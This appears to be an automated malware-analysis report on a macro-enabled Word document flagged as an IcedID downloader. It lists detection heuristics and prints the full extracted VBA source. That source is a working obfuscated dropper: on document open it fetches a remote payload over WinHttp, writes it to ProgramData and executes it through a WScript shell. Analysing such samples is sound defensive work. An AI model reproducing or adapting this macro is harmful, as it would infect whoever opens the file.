MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set MlYgu = CreateObject(EEGCu + "." + "shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set XRoug = VBA.CreateObject(eYuXT + "" + FMgzn) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14048 bytes |
SHA-256: 6ad700f72ff3b81a819cd85466b917117e67853f32c793316db2e2a81a0d6956 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lcISL"
Sub VsyHu(IPqdF, Optional ByVal XlmYx As String = "c:\programdata\EZvtA.txt", Optional ByVal FMgzn As String = "systemobject")
' Perceive slices
' Gainful exhales beseeches
' Abbreviation liquidising overtaker incompetence
' Unitary dialect spinners bunker
' Rescaling thrusters reps
' Provable postdated
' Niggled cornices
' Blameworthy leagues unmelodious thoughtful prunes
' Invites impeached graphology filament
' Equivocations subgroups wriggle
' Throughout harms evaluative ameliorating
' Heterosexuals strongest maydays
' Pliable capstan fornicates oaken epicycles
' Despond seabirds troops
' Forecasters vestments provably combusted batting positivity
' Hibernating apogee lipservice
' Meats unhealthy hammerhead housewives
' Ridges seismology vicar scrutinises closet
' Dispatchers
' Spreeing abut hobble perks
' Poses
' Chicken serenading waterresistant
' Tech yielding
' Serviette
' Cohabiting cryptanalytic
' Resistances hoarders grinning handbooks minding aggravate
Set XRoug = VBA.CreateObject(eYuXT + "" + FMgzn)
' Cryptogram ukraine opener granted
' Pergola stairhead
' Prankster trespass lasted assets taxes
' Scape vermilion precautionary coincident
Set AxYPm = XRoug.CreateTextFile(XlmYx)
' Typhus shelled dimple
' Coprocessors certifying shibboleth unmuzzled nerd
' Celebrant
' Overhear
AxYPm.WriteLine IPqdF
' Charitable transliterated extrapolate huntergatherers pomelo unconscious
' Siege
' Raved dollies blowpipe
' Photographer slanderer librarian probabilist
' Unallocated daylights privatise barbers redistribution flasks civility
' Losses exhalations
AxYPm.Close
' Tenable aeration
' Ruminatively dead spotlit
' Reversibly propylene hideout azaleas
' Bazooka blind stale bandwagon irrelevantly
' Lank rafting escalating hooters
' Microcosmic hawaii
' Mown
' Unbearably brainstorming abundance utilised rebirth
' Constrictor
' Diatoms actinides fanning fascinates
' Alertness exacerbating woodpile boosters synonymous
' Dolt walkover
' Dampest mainspring
' Wither spicy
' Sizes flying incriminates governorships appalled
' Gradually taxpayer groves wend deliverer
' Extricated tried recoverable generated
' Anti signposting sand
' Unedited teas timepiece inauspicious
' Annihilates foolproof ventriloquist hulks maladjustment
' Merriest spiny banshees rainclouds enterprise adulterations
' Dowdiest jacuzzi
' Avantgarde submerging meshing
' Purport packed pompeii shortages
' Exceptionable accidents same
' Delaying chaffed
' Centring say whispered
' Dicing suppression bomb
' Crowded litotes clockmaker marl spittle
' Acidity instantiation counterpoise
' Cavitation fuelled brandish fortified
' Myocardial beneath stalking
' Biliary pealing lousy grievously
' Crow goodish glucose shamed disgustedly
' Amalgamation subjection declarer
' Solecisms applying
' Loving wand bounced
' Loaf
' Astonishing overpopulous metronome generalship
' Learnable ohms
' Keen
' Amniotic bogeys aircraft scaly encyclopedic
' Enchant renegade peasant interlocked allusive faust deaconesses
End Sub
' Flotsam hymnbook separating turnkey
' Revolt chihuahua swindling forswearing glassware
' Byelaw moth swabbed possessing bendings nightcap veracity
' Knee
' Hillwalking outline ascetic
Sub AutoOpen()
' Rooftop purser
' Reclaimer sensationalist portends corset wilting definitiveness magisterial
' Humour barium poetic adit
' Carousing combative underpopulation scooters
' Gallantry micrographs refreshes
' Stomped bonus situationist obeys catered
' Arbitrator darkly chuffed complicates roughed
' Fluency trews
' Mitigating dessicated solicitation turtles outset
' Driers
' Chimes enactments argue douse
' Onagers ambivalently
' Sibyl sententious
' Chloroform measuring
' Ranchers charitable fingernails pillages junta
' Prohibited proofs catnip seductions conservatoire
' Demeanour uninsurable sect bill
' Credible cystine
' Reporter prissy bustling reinstalled
' Priming antagonists deception wantonly inheritors
' Creaming retailer
' Antagonised
' Landslips statistical maniacs specialisations
' Communication bearers uncongenial spawning
' Icepick wrought twelfth
' Lauds overstrung fiddlings castigating
' Pyramids charioteers luanda adaptivity
' Overacted polynomially expelled
' Wastepaper lioness grave
' Functions exile commended
Dim AmYOJ As New gUwvT
' Bivalves sporadically lessons electrolyte infelicitously
' Tortoises showroom rhetoricians
' Sits
' Counts guano clinched
' Redshift razor treasured
gUCPo = ""
' Whatsoever thieves spewing
' Overrode machismo abduction unordered onus
' Soundless donations collaboratively
' Healer lifestyles testimonies controllers
' Deserts rimless fond
' Schizophrenia tsunami pastes cribbing thither
' Street
' Engrave deeply trackers mimicker methylated
' Encrust unevenly
' Hiatus
IPqdF = AmYOJ.alWvs(DHAdD)
' Hero dinosaurs
' Skirts vicious indexer
' Bootlaces citizen verifiable shimmer nasturtium bulkhead barbecues
' Mellows perennials gatecrash smallholders
' Miscreant qualified squeakiest
VsyHu WSYSj(IPqdF)
' Fetter gunfight hexagon choral
' Corncrake printed wormhole
' Bride redeem possess dismantling they
' Deniable sit portrayal
' Accelerator coffer grisly buckets punctuational
' Confronting soundest
' Subject
' Tangled workhorse
' Standardise franked
' Unburned oklahoma breaches
' Glowered expedites
' Volunteer swore vacate ultraviolet hobnailed
WTZvL ayZJP(0) + "vr32 c:\programdata\EZvtA.txt", "wscript"
End Sub
Function Xxlue(devcp, VXtOw)
' Domed indent
' Enthralled impaler punctually papua reporter
' Pitching inhuman combining reaffirmation
' Hotair altercations acids inbuilt
' Uncleanly biasses
Xxlue = Split(devcp, VXtOw)
End Function
Attribute VB_Name = "rwHET"
' Warmblooded strides
' Unawakened royal
' Explored vaster
' Glutton
' Isomers sickens
' Hangars trackless
Function WSYSj(PHdCG)
' Desertion lambswool conciliating misanthropists
' Reformer paternal
' Aviator world
' Ducted emit
' Typologically highs
' Authenticated synthesis commentary resending martians bounce
' Clocking bound satchels
' Niggardly wellorganised prettify irascibility
WSYSj = StrConv(PHdCG, vbUnicode)
' Abetting
' Sealants explore wallowed steady
' Impinge anglers
' Comparison tottering enrage slanted sons looks
' Transitive plumpness
' Boxers selective desecrates dendrochronology oat
End Function
' Pressured lockjaw moon unbanned
' Stateoftheart ricochet ores
' Spurns neoplasm
' Pervading father disfigurements
' Considered feints
Function bwBEd()
' Rebound sisterinlaw
' Throwaway enquiry belated breakfasted
' Platoon explicitly yapping landings resprays
' Bind deflate venison petrochemical
' Elbowed joint squirted tone
' Diphthongs
' Matches tremble refresher
' Resembled peacetime wildfowl
' Sapped fishy abler curves
' Lapwing reticence metalinguistic
' Chilblains designated callow sounder
' Astrolabe fomenting presumed denture
' Fertile
With ActiveDocument.shapes(1)
bwBEd = .AlternativeText
End With
End Function
' Maori snipers elegies upthrust dirigible
' Clump juristic woollies
' Book muse stingray
' Emotionless bequeathing oldest mottled decustomised
Function ayZJP(wmAUF)
' Centred idolise loppers
' Outflow genomes language racers corrupting
' Signification articulately icings
' Tinniest snug measurably signatories abattoirs undoing
' Grouper service practising clinched biographers genders
' Intolerable
' Initialisation immigration ruthless involves
' Curtsy smocks flask closedcircuit galaxies
' Strident footprint monuments melt
' Ketchup sitters boons
' Gibbon wisely legislated transgressive
' Previews
enPyR = Xxlue(bwBEd(), "~~~")
tsDJg = enPyR(wmAUF)
ayZJP = tsDJg
End Function
Attribute VB_Name = "gUwvT"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function XDGwo(fHTKY, KdZeB, XTRdR)
' Torches stockier
' Choline home enchantingly
' Strides harassers tectonically
' Overestimate childless
' Mainstays stasis
' Inebriate utilised
XDGwo = Mid(fHTKY, KdZeB, XTRdR)
End Function
Public Function WpYes(ZxoeG, AZyxQ)
' Temperate joblessness malignant typesets substandard
' Swotting sculptor affectionately gawking
' Commissar suffocation hinterlands burgundy
' Disbands anions shoo
' Subconscious strata networked
' Factorisations servile prolong
' Obstructionism parried cooperating steepest
' Recombining neutraliser defensibility radicalism onlooker scathed
' Wins vomits
' Indentations happens sweepingly suppressing ophthalmics foamy
' Rates caravel unrepresentative grim
' Dusted spasmodically airtight
' Bust considerately sergeants grime
' Buckets floury bookworms reduction disbars tubing
' Decanted extremely bacillus methodological
' Infeasibility trucks
' Defer binds
' Humorously hernias rabidly stargazer
sNLPv = Trim(ZxoeG)
For jhsOL = AZyxQ To Len(sNLPv)
bOmSj = XDGwo(sNLPv, jhsOL, AZyxQ) & bOmSj
Next jhsOL
WpYes = bOmSj
End Function
' Subsection biennials craws
' Fevers rattles
' Slavery quibbling
' Egoistic catatonic matters mistrusting reconsulted begetting
' Warmblooded cess
Function alWvs(prRnD)
' Coupling striving
' Boats spatially baker extend
' Ponderously deliverers canton
' Dumped privileges wands
' Strangulation
Dim DFLoP As Object
' Fitter offensives verbatim
' Pews proliferation
' Taperer enemas shifting sibyl
' Rites coercing inhalation blackening attendants devolved dragooned
' Month mockups commentating prophesying
' Scarcely
' Discharge
' Antwerp
' Liner
' Puffin teetotaller
' Comeliness paramilitaries zap ragged telepathic
' Thousandths ritualised viaduct bongs little
' Spume gores legitimate hemispheric
Set DFLoP = CreateObject(WpYes(prRnD, 1) + "." + WpYes(prRnD, 1) + "Request.5.1")
' Standardisation walkout zambian relaying confiscations
' Lacquered halitosis seeker vampire
' Bike hubris sore etymological dentist boaters mocks
' Perming rubric capitalised
' Agreements tercentenary zionist broader
' Gradualism fritter chortling
' Nonparticipation footpaths dislikes fogs premiered
' Sporting landfall
' Decibels unravels lurchers preaching chastises
' Exportable aerobraking mandatory reorganised lichee rusticate
' Walkers unequivocal
' Divider
' Beseeching commonsense
' Reshaped
' Oldfashioned liquors leaderless trilogies
' Paintwork paroxysms ineptness
' Liquids bowdlerisation checkouts aswan deodorant
' Coracle
' Unfair
' Plastics
' Underwriter clinics geologic
' Reverend ripeness seemed hustler besiege
EdOFd = ayZJP(1)
' Maddens undisguised
' Hereupon uncleanliness
' Driveway exonerates genealogical borrow
' Avalanche mineworkers adrift minutiae capered
' Stopover grown respect
' Duellist hot rewritings dumfounds positional
' Calf are labellings earldoms sedate glossy
DFLoP.Open "GET", WpYes(EdOFd, 1), False
' Employable mispronunciations prebend crenellated
' Fixes buttonholes concordat
' Enfranchising underparts fifthly
' Greeds regain concertina
' Strangulation oversize polypeptides warfare
' Patrician basilisk
' Cypress reportage atmospherically strangler
DFLoP.Send
' Checked borrowing bestir dystrophy
' Peaking myocardial prude tuition
' Mythologised amethyst stressfulness
' Asymptomatic fingerless
alWvs = DFLoP.responsebody
End Function
Attribute VB_Name = "FuESu"
Public Const DHAdD As String = "ptthniw"
Public Const eYuXT As String = "scripting.file"
Sub WTZvL(CynKG, EEGCu)
' Sickroom prodigy veers wineskin
' Jewish teheran marshalled
' Ammeter postmodernist redemption
' Garb quieten definer
' Turtle concoction
' Somalia choose yaps listlessness
Set MlYgu = CreateObject(EEGCu + "." + "shell")
' Crofter teddies
' Contaminates
' Groped
' Port underneath rosemary hectic
' Employ camera mahogany programmed fanfares
' Bytes
' Airstrips vestal
' Readers overcommitment
' Grenade solitary classifications
' Clenches pairwise
' Deem lowers happy speech mortification
' Corrugations leanest infants
' Banjo defining partaken parliamentary catchment coquette domain
' Sodomising clog ominous peonies
' Cumbersomely hideaway precomputed prevalently jerseys homeland
' Imposed incised
' Automats tables
' Umbrageous griffin bleeped
' Oestrogens balderdash elastin facile
' Faked brainwashed cellists composition
' Gatepost earplugs indoctrinators
' Impropriety distrust lapwing chalices
' Khaki sophisticates fabulists revisionist whacked dermatological anthropocentric
' Calculator lingual tessellation
' Nevertheless absolutism
' Mallets interferon admonishes
' Fact inelegant internees meteors
' Zonation
' Container burdened shies border festoons
' Weigh pharmaceuticals evangelists secularised frauds downtrodden
' Cleanliness rollercoaster
' Tandems leghorns sturgeons robber mincemeat
' Upland rectal sculls
' Contexts noosed hereafter perplexities aztecs
' Catamarans amateurism tactician
' Glorification
' Madhouse harmed
' Adjudicated barman amputating malicious sweeper baggiest
' Chequebook vilified researches
' Mudflats dismantled hyperbolic
' Crotchetiness woods groundwork
' Removed sponsorship relived flapping
' Mixes farces sulkiest tactful reputes
' Incorruptible reducer moisturisers
Call MlYgu.exec(CynKG)
' Makeup previewer dassies
' Puritans regain orange motivate brushoff mudguard homeward
' Stochastic privately disproofs strata
' Architecture perforations hatchery
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 50176 bytes |
SHA-256: c84da60f1fecdffd69a1df515d9aa95b2dda38c2c87cf3ab69ff2323f4f7a204 |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.